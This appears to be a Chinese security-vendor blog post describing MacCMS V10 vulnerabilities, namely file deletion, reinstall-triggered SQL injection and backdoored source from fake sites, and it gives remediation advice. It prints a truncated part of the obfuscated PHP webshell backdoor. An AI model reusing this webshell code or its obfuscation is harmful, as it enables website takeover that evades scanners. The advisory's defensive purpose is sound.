蘋果CMS漏洞 V10版本存在原始碼後門webshell POC

網站安全發表於2020-01-07

目前蘋果CMS官方在不斷的升級補丁,官方最新的漏洞補丁對於目前爆發的新漏洞沒有任何效果。更新補丁的使用者網站還是會遭受到掛馬的攻擊,很多客戶因此找到我們SINE安全尋求網站安全技術上的支援,針對該漏洞我們有著獨特的安全解決方案以及防止掛馬攻擊的防護,包括一些未公開的maccms POC漏洞都有修復補丁。

蘋果CMS漏洞 V10版本存在原始碼後門webshell POC

目前maccms官方被百度網址安全中心提醒您:該站點可能受到黑客攻擊,部分頁面已被非法篡改! 蘋果官方網站因為特殊原因已經停止訪問,該內容被禁止訪問,但是升級補丁更新的網址還是可以開啟的。

截圖如下:

蘋果CMS漏洞 V10版本存在原始碼後門webshell POC

蘋果CMS漏洞詳情:

蘋果CMS V8 V10版本存在程式碼重灌漏洞,以及程式碼後門漏洞,任意檔案刪除漏洞,通過CNVD-2019-43865的資訊保安漏洞通報,可以確認maccms V10存在漏洞,可以偽造惡意程式碼傳送到網站後端進行執行,可以刪除網站目錄下的任意檔案,可刪除重灌蘋果CMS系統的配置檔案,導致可以重新安裝maccms系統,並在安裝過程中插入sql注入程式碼到資料庫中去執行並獲取webshell以及伺服器許可權。

蘋果CMS漏洞 V10版本存在原始碼後門webshell POC

蘋果CMS V8 V10 原始碼存在後門漏洞,經過我們SINE安全技術的檢測發現,存在後門的原因是,目前百度搜尋蘋果官網,maccms官方,排在百度搜尋首頁的都是仿冒的網站,真正官網地址是www.maccms.com,包括模板,圖片,以及CSS跟真正的官方是一模一樣,很多客戶都是點選到這個山寨網站上去進行下載的原始碼,該程式碼裡隱藏了木馬後門檔案,阿里雲都無法檢測出來,

<?php

error_reporting(E_ERROR);

@ini_set('display_errors','Off');

@ini_set('max_execution_time',20000);

@ini_set('memory_limit','256M');

header("content-Type: text/html; charset=utf-8");

$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..

define('Viv, bebegim.','Denzel-你的英雄'); // 標題

function s(){

$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s

7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323

程式碼如上面所示,是加密過的,經過我們SINE安全的解密發現是PHP的指令碼木馬,可以繞過各大伺服器廠商的安全檢測,包括阿里雲,騰訊雲,百度雲,華為雲。

關於蘋果CMS網站漏洞的修復方案與辦法

對任意檔案刪除漏洞做安全過濾與檢查,防止del刪除的語句的執行,對前端傳輸過來的引數進行嚴格的檢測,不管是get,post,cookies,如果您對程式碼不是太懂的話也可以找專業的網站安全公司來處理解決蘋果CMS網站被攻擊的問題,或者是對重灌檔案進行改名以及安裝配置檔案進行許可權設定,只讀許可權,對於存在網站木馬後門的蘋果cms系統,人工對程式碼進行安全審計,對所有網站目錄下每個程式碼檔案都要仔細的排查,可以下載官方的原始碼進行比對。


來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/31542418/viewspace-2672259/,如需轉載,請註明出處,否則將追究法律責任。

相關文章